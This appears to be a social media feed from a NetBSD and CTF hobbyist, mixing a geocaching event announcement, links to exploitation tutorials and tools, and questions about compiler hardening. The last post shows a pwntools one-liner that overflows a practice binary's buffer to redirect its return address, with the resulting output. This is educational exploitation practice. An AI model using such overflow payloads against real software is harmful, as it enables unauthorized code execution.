@hubertf

279 Followers
165 Following
730 Posts

Save the date: ibug 2026 - 10-jähriges Jubiläum:

Sa 22.08.2026: 10:00 Geocaching-Event:
ibug 2026 (GCBKXVZ), 03525 Riesa

Event-Publish erfolgt reichtzeitig. Fühlt euch eingeladen!

#geocaching #ibug #streetart #lostplace

@mpeterma without the talk it's bit lengthy and not so clear what's going on.

A very detailed tutorial from "Joaquin Pinillos"

Walk x86-64 page tables by hand in qemu and gdb. Decompose a virtual address, follow cr3 through all levels of physical memory, and extract a flag from raw bytes.

https://github.com/jazho76/page_table_walk

#reverseengineering #linux #ctf

State of the art AI in 2026 :-)

#ctf #ai #cybersecurity

<3 angrop

#ctf #cybersecurity #angr #angrop #return-oriented-programming #ropchain #rop

@netbsd thanks for explainint. then why does a simple "gcc foo.c -o foo" have different security features enabled on NetBSD, FreeBSD, Linux? (no pkgsrc, Makefile or mk/* involved)

I guess having one big switch somewhere in gcc for all of NetBSD's platform would be challenging. Is this kept on the least common denominator on purpose?

@jschauma good point. what do you suggest to learn about it?
[error]: lp0 on fire
hubertf's NetBSD blog

This afternoon's fun: pwning NetBSD-aarch64 (ARM)

(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm

#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb #ctf